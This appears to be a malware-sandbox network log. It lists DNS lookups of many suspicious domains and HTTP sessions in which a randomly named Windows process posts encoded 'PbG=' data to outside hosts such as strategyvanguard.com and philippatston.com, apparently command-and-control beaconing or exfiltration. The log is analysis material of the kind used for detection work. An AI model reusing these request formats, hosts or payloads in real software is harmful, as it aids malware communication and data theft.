Oct 4, 2024 12:00:22.306195021 CEST | 192.168.11.20 | 1.1.1.1 | 0x4170 | Standard query (0) | www.ytfunnels.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:35.943870068 CEST | 192.168.11.20 | 1.1.1.1 | 0xd5d1 | Standard query (0) | www.hedieplastic.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:36.957112074 CEST | 192.168.11.20 | 9.9.9.9 | 0xd5d1 | Standard query (0) | www.hedieplastic.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:51.659775972 CEST | 192.168.11.20 | 9.9.9.9 | 0x54d7 | Standard query (0) | www.helpers-lion.online | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:59.813678026 CEST | 192.168.11.20 | 9.9.9.9 | 0x2b81 | Standard query (0) | www.doodstream.beauty | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:01:07.968060017 CEST | 192.168.11.20 | 9.9.9.9 | 0xc70d | Standard query (0) | www.gipsytroya.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:01:24.713829994 CEST | 192.168.11.20 | 9.9.9.9 | 0x3658 | Standard query (0) | www.seninbeniimikaf.buzz | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:03:32.419601917 CEST | 192.168.11.20 | 9.9.9.9 | 0x64d0 | Standard query (0) | www.99b6q.xyz | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:03:40.575244904 CEST | 192.168.11.20 | 9.9.9.9 | 0xc3cb | Standard query (0) | www.seninbeniimikaf.buzz | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:03:48.729711056 CEST | 192.168.11.20 | 9.9.9.9 | 0x1482 | Standard query (0) | www.eagleup.org | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:02.383013010 CEST | 192.168.11.20 | 9.9.9.9 | 0x1091 | Standard query (0) | www.5597043.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:15.567579985 CEST | 192.168.11.20 | 9.9.9.9 | 0x2583 | Standard query (0) | www.drivemktg.co | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:29.345907927 CEST | 192.168.11.20 | 9.9.9.9 | 0x13f5 | Standard query (0) | www.dadayute.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:34.766040087 CEST | 192.168.11.20 | 9.9.9.9 | 0xb44b | Standard query (0) | www.seninbeniimikaf.buzz | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:05:30.596968889 CEST | 192.168.11.20 | 9.9.9.9 | 0x3b03 | Standard query (0) | www.99b6q.xyz | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:05:35.706357956 CEST | 192.168.11.20 | 9.9.9.9 | 0x9085 | Standard query (0) | www.inform-you.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:05:40.830218077 CEST | 192.168.11.20 | 9.9.9.9 | 0x7163 | Standard query (0) | www.gipsytroya.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 4, 2024 11:57:17.125833988 CEST | 1.1.1.1 | 192.168.11.20 | 0x8b8a | No error (0) | drive.google.com |  | 142.251.40.174 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:57:17.794464111 CEST | 1.1.1.1 | 192.168.11.20 | 0x2b3f | No error (0) | drive.usercontent.google.com |  | 142.250.176.193 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:57:57.762329102 CEST | 1.1.1.1 | 192.168.11.20 | 0x5efe | Name error (3) | www.seninbeniimikaf.buzz | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:02.955924034 CEST | 1.1.1.1 | 192.168.11.20 | 0x91b4 | No error (0) | www.eagleup.org | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:58:02.955924034 CEST | 1.1.1.1 | 192.168.11.20 | 0x91b4 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:18.517997980 CEST | 1.1.1.1 | 192.168.11.20 | 0xceb1 | No error (0) | www.strategyvanguard.com |  | 185.134.245.113 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:32.285661936 CEST | 1.1.1.1 | 192.168.11.20 | 0xe68f | No error (0) | www.philippatston.com | comingsoon.namebright.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:58:32.285661936 CEST | 1.1.1.1 | 192.168.11.20 | 0xe68f | No error (0) | comingsoon.namebright.com | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:58:32.285661936 CEST | 1.1.1.1 | 192.168.11.20 | 0xe68f | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | 184.73.212.51 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:32.285661936 CEST | 1.1.1.1 | 192.168.11.20 | 0xe68f | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | 18.235.170.27 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:45.572030067 CEST | 1.1.1.1 | 192.168.11.20 | 0x4565 | No error (0) | www.stayvact.xyz |  | 199.192.19.19 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:59.531753063 CEST | 1.1.1.1 | 192.168.11.20 | 0x7eae | No error (0) | www.sleephygienist.org |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:59.531753063 CEST | 1.1.1.1 | 192.168.11.20 | 0x7eae | No error (0) | www.sleephygienist.org |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:59:13.543764114 CEST | 1.1.1.1 | 192.168.11.20 | 0x3b86 | No error (0) | www.xn--fhq1c541j0zr.com |  | 43.252.167.188 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:59:33.253293991 CEST | 1.1.1.1 | 192.168.11.20 | 0x5ad2 | No error (0) | www.jennarauten.com | jennarauten.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:59:33.253293991 CEST | 1.1.1.1 | 192.168.11.20 | 0x5ad2 | No error (0) | jennarauten.com |  | 31.217.192.158 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:59:47.743871927 CEST | 1.1.1.1 | 192.168.11.20 | 0x4a4a | No error (0) | www.taketechai.com | www.taketechai.com.cdn.hstgr.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:59:47.743871927 CEST | 1.1.1.1 | 192.168.11.20 | 0x4a4a | No error (0) | www.taketechai.com.cdn.hstgr.net |  | 191.101.104.164 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:00.975788116 CEST | 1.1.1.1 | 192.168.11.20 | 0xff9e | No error (0) | www.297tamatest1kb.com |  | 162.255.119.150 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:14.254194975 CEST | 1.1.1.1 | 192.168.11.20 | 0x1451 | Name error (3) | www.99b6q.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:22.460211039 CEST | 1.1.1.1 | 192.168.11.20 | 0x4170 | No error (0) | www.ytfunnels.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 12:00:22.460211039 CEST | 1.1.1.1 | 192.168.11.20 | 0x4170 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:37.513426065 CEST | 9.9.9.9 | 192.168.11.20 | 0xd5d1 | No error (0) | www.hedieplastic.com |  | 46.102.130.116 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:37.531266928 CEST | 1.1.1.1 | 192.168.11.20 | 0xd5d1 | No error (0) | www.hedieplastic.com |  | 46.102.130.116 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:51.760237932 CEST | 9.9.9.9 | 192.168.11.20 | 0x54d7 | Name error (3) | www.helpers-lion.online | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:59.915045977 CEST | 9.9.9.9 | 192.168.11.20 | 0x2b81 | Name error (3) | www.doodstream.beauty | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:01:08.180224895 CEST | 9.9.9.9 | 192.168.11.20 | 0xc70d | No error (0) | www.gipsytroya.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 12:01:08.180224895 CEST | 9.9.9.9 | 192.168.11.20 | 0xc70d | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:01:24.814486980 CEST | 9.9.9.9 | 192.168.11.20 | 0x3658 | Name error (3) | www.seninbeniimikaf.buzz | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:03:32.519587994 CEST | 9.9.9.9 | 192.168.11.20 | 0x64d0 | Name error (3) | www.99b6q.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:03:40.674351931 CEST | 9.9.9.9 | 192.168.11.20 | 0xc3cb | Name error (3) | www.seninbeniimikaf.buzz | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:03:48.900536060 CEST | 9.9.9.9 | 192.168.11.20 | 0x1482 | No error (0) | www.eagleup.org | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 12:03:48.900536060 CEST | 9.9.9.9 | 192.168.11.20 | 0x1482 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:02.489903927 CEST | 9.9.9.9 | 192.168.11.20 | 0x1091 | No error (0) | www.5597043.com | star-web-prod-1839730.pages.dev |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 12:04:02.489903927 CEST | 9.9.9.9 | 192.168.11.20 | 0x1091 | No error (0) | star-web-prod-1839730.pages.dev |  | 172.66.44.73 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:02.489903927 CEST | 9.9.9.9 | 192.168.11.20 | 0x1091 | No error (0) | star-web-prod-1839730.pages.dev |  | 172.66.47.183 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:15.739336014 CEST | 9.9.9.9 | 192.168.11.20 | 0x2583 | No error (0) | www.drivemktg.co |  | 193.108.130.23 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:29.474507093 CEST | 9.9.9.9 | 192.168.11.20 | 0x13f5 | No error (0) | www.dadayute.com |  | 74.208.236.225 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:04:34.866409063 CEST | 9.9.9.9 | 192.168.11.20 | 0xb44b | Name error (3) | www.seninbeniimikaf.buzz | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:05:30.696662903 CEST | 9.9.9.9 | 192.168.11.20 | 0x3b03 | Name error (3) | www.99b6q.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:05:35.812764883 CEST | 9.9.9.9 | 192.168.11.20 | 0x9085 | Name error (3) | www.inform-you.com | none | none | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:05:40.932153940 CEST | 9.9.9.9 | 192.168.11.20 | 0x7163 | No error (0) | www.gipsytroya.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 12:05:40.932153940 CEST | 9.9.9.9 | 192.168.11.20 | 0x7163 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49732 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:03.145682096 CEST | 425 | OUT | GET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.eagleup.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 11:58:03.329385042 CEST | 113 | IN | HTTP/1.1 439
date: Fri, 04 Oct 2024 09:58:03 GMT
content-length: 0
server: Parking/1.0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49733 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:18.719450951 CEST | 708 | OUT | POST /nx20/ HTTP/1.1
Host: www.strategyvanguard.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.strategyvanguard.com
Referer: http://www.strategyvanguard.com/nx20/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN7RIx/i6Ev35tSd9SsWWODYmndoVtKr+4PYmrApeNdeqzecssTFOEeaffU41CLzA10A+LmSODWRUHKQ+DbrCdJpNUhEPWnYZsdcb3vR1K7/Wt5aZ7LfVKj50Z3eHy+7DTpUpVsZYBdoHMreL6oFHtDD4UHLEc1stnP5uf8YXPwbaWAKs8X/D/9Q==
Oct 4, 2024 11:58:18.916870117 CEST | 313 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:18 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49734 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:21.432881117 CEST | 728 | OUT | POST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN6yAx5BiEoX5iZ99S1GWKDYandphHNZa4M8urDtqNeeqzGMstQ1PIeaC8U5JCL3o10FaLnl6AXBUJCw+BG7CdJpNUhEbwnYBsevT3pw1JnPWutKZ7PfUDj50w3fbL+57TpVZVrLwCEYHwl+Kp5E+daDAdGM8Q3ZlOKv/FhqjrzIGkE6VUV9CkgcsMJxtgEIwYxD7IxUQi+VA=
Oct 4, 2024 11:58:21.626240015 CEST | 313 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:21 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49735 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:24.152307987 CEST | 6933 | OUT | POST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG= [TRUNCATED]
Oct 4, 2024 11:58:24.345967054 CEST | 313 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:24 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49736 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:26.870014906 CEST | 434 | OUT | GET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 11:58:27.063532114 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:26 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Expires: Fri, 04 Oct 2024 10:58:26 GMT
                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                    Cache-Control: public
                                                                                                                                                    Data Ascii: 1560<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.strategyvanguard.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
Oct 4, 2024 11:58:27.063607931 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { posi
Oct 4, 2024 11:58:27.063683987 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: <br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.strategyvanguard.com') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vr
Oct 4, 2024 11:58:27.063757896 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: } </script> <div class="container"> <h1 id="t"> www.strategyvanguard.com is parked </h1> <p id="m"> www.strategyvanguard.com is registered, but the owner currently does not have an
Oct 4, 2024 11:58:27.063819885 CEST | 587 | IN
                                                                                                                                                    Data Ascii: er"> <span >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 2844e36625e34a85b97e954b68aca6bc/parkedweb01 </span> </div> <script> q("ls").setAttribute("s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49737 | 184.73.212.51 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:32.391753912 CEST | 699 | OUT | POST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNr5AT/Dq9xBzJXUfb1nmqVcEMtaee76yvtl1HjpI0S3zyiVI1IZPoFLC8oWcORV7fQpdIDUkqXZAyemjY3Ckeh6ceDqw+tvt7lVmqHvPu18cP/RgT9K48v00jI1POpqCzrAYsCkF6pSXoK6GzLAfocwfMGwZjOEgZFqluFr4JGSzUZenUJFpuQ==
Oct 4, 2024 11:58:32.494491100 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:32 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
Oct 4, 2024 11:58:32.494594097 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
Oct 4, 2024 11:58:32.494687080 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 11:58:32.494780064 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 11:58:32.494930029 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 11:58:32.494992018 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 11:58:32.495083094 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 11:58:32.495146990 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 11:58:32.495232105 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
